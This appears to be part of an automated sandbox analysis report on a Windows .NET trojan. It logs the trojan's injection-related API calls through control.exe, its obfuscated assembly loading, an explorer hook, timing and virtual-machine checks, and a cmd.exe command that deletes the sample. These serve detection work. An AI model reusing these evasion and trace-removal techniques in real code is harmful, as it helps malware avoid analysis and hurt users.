          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92C60 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92BE0 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D94650 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D93090 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D93010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D94340 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D93D70 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D93D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D939B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A360 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A490 NtClose
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A410 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A540 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A3B3 NtCreateFile, NtReadFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A40D NtReadFile
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8A53B NtAllocateVirtualMemory
          Source: UgHXEfw1uL.exe, 00000000.00000002.2070651053.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000002.2074381335.000000000D330000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000000.2048953937.00000000006C4000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamegozr.exe2 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C84000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.000000000101D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EBD000.00000040.10000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, Binary or memory string: OriginalFilenamegozr.exe2 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: UgHXEfw1uL.exe, ReversingLabs: Detection: 21%
          Source: UgHXEfw1uL.exe, Virustotal: Detection: 31%
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exe
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Process created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exe
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UgHXEfw1uL.exe.log
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@53/1@12/5
          Source: C:\Windows\explorer.exe, File read: C:\Users\desktop.ini
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: _0020.AddAccessRule
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, bOaEQFmmVIlgCiiuqu.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.cs, Security API names: _0020.AddAccessRule
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, bOaEQFmmVIlgCiiuqu.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: UgHXEfw1uL.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: UgHXEfw1uL.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: UgHXEfw1uL.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: UgHXEfw1uL.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UgHXEfw1uL.exe, UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: gozr.pdb source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: Binary string: gozr.pdbSHA256 source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe

          Data Obfuscation

          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.cs, .Net Code: h8ya7PmBqg System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, -Module-.cs, .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, wA.cs, .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, -Module-.cs, .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, wA.cs, .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.cs, .Net Code: h8ya7PmBqg System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 0_2_05E3F71B push esp; iretd 0_2_05E3F71E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 0_2_05E35191 push DC0568D5h; retf 0_2_05E3519D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 0_2_05E35390 push eax; retf 0_2_05E3539D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 0_2_0767C692 pushad ; iretd 0_2_0767C699
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_004164CE push FFFFFFA9h; ret 3_2_004164ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00416CA1 push cs; retf 3_2_00416CC3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F209AD push ecx; mov dword ptr [esp], ecx 3_2_00F209B6
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E60CB02 push esp; retn 0000h 4_2_0E60CB03
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E60CB1E push esp; retn 0000h 4_2_0E60CB1F
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E60C9B5 push esp; retn 0000h 4_2_0E60CAE7
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E750B1E push esp; retn 0000h 4_2_0E750B1F
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E750B02 push esp; retn 0000h 4_2_0E750B03
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E7509B5 push esp; retn 0000h 4_2_0E750AE7
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D509AD push ecx; mov dword ptr [esp], ecx 5_2_04D509B6
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8D4B5 push eax; ret 5_2_02A8D508
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A864CE push FFFFFFA9h; ret 5_2_02A864ED
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8D50B push eax; ret 5_2_02A8D572
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8D502 push eax; ret 5_2_02A8D508
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A8D56C push eax; ret 5_2_02A8D572
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_02A86CA1 push cs; retf 5_2_02A86CC3
          Source: initial sample, Static PE information: section name: .text entropy: 7.810545429614008

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe, User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match, File source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTR
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe, RDTSC instruction interceptor: First address: 0000000002A79904 second address: 0000000002A7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe, RDTSC instruction interceptor: First address: 0000000002A79B7E second address: 0000000002A79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe, Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-13901
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239875s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239765s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239656s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239547s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239437s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239328s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239219s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239109s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -239000s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238890s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238781s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238672s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238562s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238453s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238343s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028, Thread sleep time: -238234s >= -30000s
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 1396, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6352, Thread sleep count: 9506 > 30
          Source: C:\Windows\explorer.exe TID: 6352, Thread sleep time: -19012000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6352, Thread sleep count: 447 > 30
          Source: C:\Windows\explorer.exe TID: 6352, Thread sleep time: -894000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 5800, Thread sleep count: 7777 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 5800, Thread sleep time: -15554000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 5800, Thread sleep count: 2190 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 5800, Thread sleep time: -4380000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe, Last function: Thread delayed
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239875
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239765
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239656
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239547
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239437
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239328
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239219
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239109
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 239000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238890
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238672
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238562
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238453
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238343
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 238234
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Window / User API: threadDelayed 790
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Window / User API: threadDelayed 2343
          Source: C:\Windows\explorer.exe, Window / User API: threadDelayed 9506
          Source: C:\Windows\explorer.exe, Window / User API: threadDelayed 447
          Source: C:\Windows\explorer.exe, Window / User API: foregroundWindowGot 888
          Source: C:\Windows\explorer.exe, Window / User API: foregroundWindowGot 862
          Source: C:\Windows\SysWOW64\control.exe, Window / User API: threadDelayed 7777
          Source: C:\Windows\SysWOW64\control.exe, Window / User API: threadDelayed 2190
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exe, API coverage: 2.3 %
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Process information queried: ProcessInformation
          Source: explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000003.3841659566.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
          Source: explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000003.3841659566.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: control.exe, 00000005.00000002.4532013045.0000000003125000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2!
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.0000000003125000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: control.exe, 00000005.00000002.4532013045.00000000030E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
          Source: explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
